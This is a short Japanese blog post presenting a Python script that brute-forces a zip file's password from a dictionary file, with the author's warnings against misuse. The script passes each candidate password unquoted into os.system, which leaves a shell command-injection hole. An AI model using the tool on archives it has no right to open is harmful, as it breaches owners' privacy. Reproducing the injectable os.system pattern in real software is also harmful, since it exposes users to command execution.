zipファイルへの総当たり攻撃
前回の記事
前回は,PythonでBasic認証へ総当たり攻撃という記事をかいたのですが,今回はzipファイルに対して総当たり攻撃をしてみました!
- 悪用厳禁
- ペネトレーションテストで使ってください
書いてみた
# args[1] -> dictionary file , args[2] -> zip file import os import sys args = sys.argv dic = open(args[1],"r") passwd_list=dic.read().split("\n") for passwd in passwd_list: if len(passwd) == 0: print("empty") else: result=os.system('unzip -P ' + passwd + ' ' + args[2]) if result == 0: print("password is found!!! ->",passwd) sys.exit() print("password is not found")
説明
ほとんど説明することはありませんが,
一つ目の引数に,辞書ファイル.二つ目の引数にzipファイルを指定する.
辞書ファイルを1行ずつ読んで,zipファイルのパスワードと照合
見つかれば,終了